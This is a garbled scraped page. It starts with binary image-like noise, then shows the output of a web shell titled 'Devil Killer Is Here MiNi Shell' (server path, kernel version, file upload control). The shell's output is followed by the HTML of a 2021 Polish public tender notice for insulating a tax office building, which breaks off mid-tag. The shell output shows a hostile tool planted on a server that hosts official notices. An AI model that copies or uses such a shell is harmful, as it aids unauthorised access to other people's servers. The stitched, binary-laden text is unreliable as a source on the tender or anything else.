JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210316/0001847201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00018472 z dnia 2021-03-16</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku Urzędu Skarbowego w Pruszczu Gdańskim </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Izba Administracji Skarbowej w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001021197</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 75/76</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-831</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 58 300 23 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 58 301 24 44</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.ias.gdansk@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pomorskie.kas.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku Urzędu Skarbowego w Pruszczu Gdańskim </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f792f6e1-863e-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00018472</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Termomodernizacja pięciu budynków użyteczności publicznej – I US w Gdyni, US w Kwidzynie, US w Pruszczu Gd., US w Starogardzie Gd., US w Tczewie. POIS.01.03.01 -00-0136/16 w ramach poddziałania 1.3.1 oś priorytetowa I Zmniejszenie emisyjności gospodarki Programu Operacyjnego Infrastruktura i Środowisko 2014 – 2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ias-gdansk.eb2b.com.pl/organizer-preview-auction.html/244582/termomodernizacja-budynku-urzedu-skarbowego-w-pruszczu-gdanskim <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ias-gdansk.eb2b.com.pl/organizer-preview-auction.html/244582/termomodernizacja-budynku-urzedu-skarbowego-w-pruszczu-gdanskim</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo aplikacyjne umożliwiające pracę na PlatformieZakupowej, tj.: 1 stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s; 2 komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2GB Ram, procesor IntelIV 2GHZ lub lepszy, jeden z systemów operacyjnych - MS Windows 7, Mac Os x10.4, Linux, lub ichnowsze wersje; 3 zainstalowana dowolna przeglądarka internetowa; w przypadku Internet Explorerminimalnie wersja 10.0.; 4 włączona obsługa JavaScript; 5 zainstalowany program Acrobat Reader.Zamawiający określa dopuszczalne formaty przesyłanych danych, tj. plików owielkości do 50 MB wformatach: pdf. Wykonawca składa ofertę poprzez dodanie w zakładce Załączniki dokumentów(załączników) określonych w SWZ i podpisanych kwalifikowanym podpisem elektronicznym, podpisuosobistego lub podpisu zaufanego.Szczegółowy opis dotyczący komunikacji elektronicznej i sposobuskładania ofert zapisany został w SWZ dostępnej na stronie: https://iasgdansk.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.2.3. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016r., str. 1), dalej RODO, informuję, że: 1) Administratorem Pani/Pana danych osobowych jestDyrektor Izby Administracji Skarbowej w Gdańsku, ul. Długa 75/76, 80-831 Gdańsk, tel. 58 300 23 00,adres e mail: is@mf.gov.pl , 2) Kontakt z Inspektorem Ochrony Danych możliwy jest pod adresem emailiod.gdansk@mf.gov.pl ,3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, na:termomodernizację budynku Urzędu Skarbowego w Pruszczu Gdańskim, znak postępowania: 2201-ILN-2.260.6.2021, prowadzonym w trybie podstawowym,4)Odbiorcami Pani/Pana danych osobowychbędą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art.18 oraz art. 74 ust. 1 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. 2019poz. 2019 ze zm.), zwanego dalej pzp: upoważnieni przez Dyrektora Izby Administracji Skarbowej wGdańsku pracownicy Izby Administracji Skarbowej w Gdańsku, osoby lub podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 Ustawy zdnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. 2019 poz. 2019 ze zm.), podmiotyprzetwarzające - którym zlecimy czynności wymagające przetwarzania danych, podmioty upoważnionena podstawie przepisów prawa. podmioty uczestniczące w realizacji Umowy. 5)Przysługuje Pani/Panuprawo do żądania od administratora dostępu do swoich danych osobowych, prawo do ichsprostowania, usunięcia lub ograniczenia przetwarzania, prawo do przenoszenia swoich danych.6)Pani/Pana dane nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, jak i nie będąpodlegały profilowaniu, o którym mowa w art. 22 ust. 1 i 4 RODO. 7)Przysługuje Pani/Panu prawo downiesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. 8)Obowiązek podania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowymokreślonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówieniapublicznego; konsekwencje niepodania określonych danych wynikają z pzp. 9)W odniesieniu doPani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z powyższym.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2201-ILN-2.260.6.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1130883,77 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Termomodernizacja budynku Urzędu Skarbowego w Pruszczu Gdańskim </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty uzyskane przez ofertę za poszczególne kryteria wyboruzostaną zsumowane. Wybrana zostanie oferta, która spełnia wszystkie wymagania określone wspecyfikacji warunków zamówienia i uzyska największą liczbę punktów. Oferta może otrzymaćmaksymalnie 100punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres dodatkowej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Wykonawca spełni warunek zdolności technicznej, jeżeli wykaże, że w okresie ostatnich 5 latprzed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – wtym okresie, należycie wykonał minimum jedno zadanie inwestycyjne w czynnym obiekcie,polegające na termomodernizacji obiektu użyteczności publicznej o wartości robót minimum 500000,00 złotych brutto i kubaturze obiektu minimum 3 000 m3. 2) Wykonawca spełni warunekzdolności zawodowej jeżeli wykaże, że dysponuje:a) Kierownikiem budowy (w rozumieniuustawy Prawo Budowlane), który będzie odpowiedzialny za nadzór merytoryczny i organizacyjnynad realizacją przedmiotu zamówienia ze strony Wykonawcy, kontrolę i koordynacje zespołuWykonawcy, kontakty z Zamawiającym, przygotowanie raportów – osoba ta musi posiadaćnastępujące kwalifikacje zawodowe, doświadczenie oraz uprawnienia: - uprawnienia budowlanedo kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeńw odniesieniu do konstrukcji oraz architektury obiektu, zgodnie z obowiązującymi przepisamiprawa lub ważne uprawnienia budowlane wydane według wcześniejszych przepisów lubuprawnienia równorzędne według przepisów kraju ich uzyskania,- aktualne zaświadczenie o wpisie do właściwej izby samorządu zawodowego lub równoważne według przepisów kraju ichuzyskania,- minimum 3 lata doświadczenia jako kierownik budowy,b) Kierownikiem robótsanitarnych (w rozumieniu ustawy Prawo Budowlane) – osoba ta musi posiadać następującekwalifikacje zawodowe, doświadczenie oraz uprawnienia: - uprawnienia budowlane dokierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji iurządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bezograniczeń, zgodnie z obowiązującymi przepisami prawa lub ważne uprawnienia budowlanewydane według wcześniejszych przepisów lub uprawnienia równorzędne według przepisówkraju ich uzyskania,- aktualne zaświadczenie o wpisie do właściwej izby samorząduzawodowego lub równoważne według przepisów kraju ich uzyskania,- minimum 3 latadoświadczenia jako kierownik robót sanitarnych,c) Kierownikiem robót elektrycznych (wrozumieniu ustawy Prawo Budowlane) – osoba ta musi posiadać następujące kwalifikacjezawodowe, doświadczenie oraz uprawnienia:- uprawnienia budowlane do kierowania robotamibudowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych ielektroenergetycznych bez ograniczeń, zgodnie z obowiązującymi przepisami prawa lub ważneuprawnienia budowlane wydane według wcześniejszych przepisów lub uprawnieniarównorzędne według przepisów kraju ich uzyskania,- aktualne zaświadczenie o wpisie dowłaściwej izby samorządu zawodowego lub równoważne według przepisów kraju ich uzyskania,-minimum 3 lata doświadczenia jako kierownik robót elektrycznych.Funkcje kierownika budowy,kierownika robót sanitarnych, kierownika robót elektrycznych może pełnić jedna osoba o ile jejuprawnienia będą obejmowały wymagane specjalności i zakres czynności przewidzianych dlaosób pełniących samodzielne funkcje techniczne w budownictwie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie niepodlegania wykluczeniu z postępowania, Wykonawca składa oświadczenie oniepodleganiu wykluczeniu z postępowania - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. Wprzypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o nie podleganiuwykluczeniu składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. oświadczenie o spełnianiu warunków udziału w postępowaniu – wzóroświadczenia stanowi Załącznik nr 4 do SWZ, 2. wykaz robót budowlanych wykonanych nie wcześniejniż w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jestkrótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te robotybudowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonanezgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o którychmowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego robotybudowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawcanie jest w stanie uzyskać tych dokumentów – inne dokumenty. Wykaz należy sporządzić zgodnie zewzorem stanowiącym Załącznik nr 5 do SWZ - Wykaz robót 3. wykaz osób, skierowanych przezWykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanierobotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresuwykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami.Wykaz należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 6 do SWZ - Wykaz osób.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Pełnomocnictwo upoważniające do złożenia oferty, o ile składa pełnomocnik.2.Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnieubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawcówwspólnie ubiegających się o udzielenie zamówienia.3. Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacjidanego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawcarealizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu (jeżelidotyczy) - Załącznik nr 7 do SWZ.4. Klauzula informacyjna dotycząca przetwarzania danychosobowych - Załącznik nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianiewarunków udziału w postępowaniu Wykonawcy wykazują łącznie.2. W przypadku wspólnegoubiegania się o udzielenie zamówienia każdy z Wykonawców wspólnie ubiegających się oudzielenie zamówienia, nie może podlegać wykluczeniu z postępowania na podstawie art. 108ust.1 oraz art. 109 ust. 1 pkt 8 pzp. 3. Wykonawcy mogą wspólnie ubiegać się o udzieleniezamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ichw postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciaumowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy może nastąpić za zgodą obu Stron i wymaga zachowania formy pisemnej podrygorem nieważności. 2. Zamawiający przewiduje możliwość dokonania istotnych zmian umowyw stosunku do oferty Wykonawcy w następujących przypadkach:1) zmiany umownego terminuwykonania przedmiotu umowy, w następujących przypadkach:a) niedotrzymanie pierwotnegoterminu stanowi konsekwencję okoliczności niezależnych od stron umowy, których nie możnabyło przewidzieć pomimo zachowania należytej staranności stron, w tym działania siły wyższej,takich jak klęski żywiołowe, pandemii koronawirusa, które utrudniają lub uniemożliwiająprzeprowadzenie robót, objętych przedmiotem umowy,b) brak możliwości dojazdu i transportumateriałów na teren budowy, spowodowany awariami, remontami lub przebudową drógdojazdowych poza terenem budowy,c) zaistnienie okoliczności, leżących po stronieZamawiającego - wstrzymania robót przez Zamawiającego,2) zmiany osób, występujących wimieniu Wykonawcy, wymienionych w ofercie Wykonawcy oraz w umowie (o których mowa wpar. 15 ust. 2), spełniających wymagania wymienione w par. 15 ust. 3; 3) zmiana uzasadnionaokolicznościami, o których mowa w art. 3571 Kodeksu cywilnego, przy czym za rażącą zostanieuznana strata, o której mowa w art. 397 Kodeksu spółek handlowych.3. W przypadkuwystąpienia okoliczności, o której mowa w ust. 2 pkt 1 termin umowny może ulec przedłużeniu oczas trwania tych okoliczności.4. Niewykonanie części robót w rezultacie zmiany umowy możeprowadzić do zmniejszenia wynagrodzenia. 5. Wszystkie postanowienia dotyczące zmiany umowy, stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, nie stanowiąjednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.6. Zamawiającydopuszcza możliwość zmiany umowy w przypadkach innych, niż określone w ust. 2, o ile zmianyte mieszczą się w katalogu zmian określonym w art. 455 ust. 1 pkt 4 ustawy Prawo zamówieńpublicznych - jeżeli konieczność zmiany zawartej umowy spowodowana jest okolicznościami,których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana niemodyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nieprzekracza 50% wartości pierwotnej umowy.7. Za zmianę nieistotną uważa się zmianę rachunkubankowego Wykonawcy oraz zmianę danych kontaktowych. Zmiana ta nie wymaga zmianyumowy, dla swojego skutku wystarczy niezwłoczne pisemne zawiadomienie drugiej Strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, 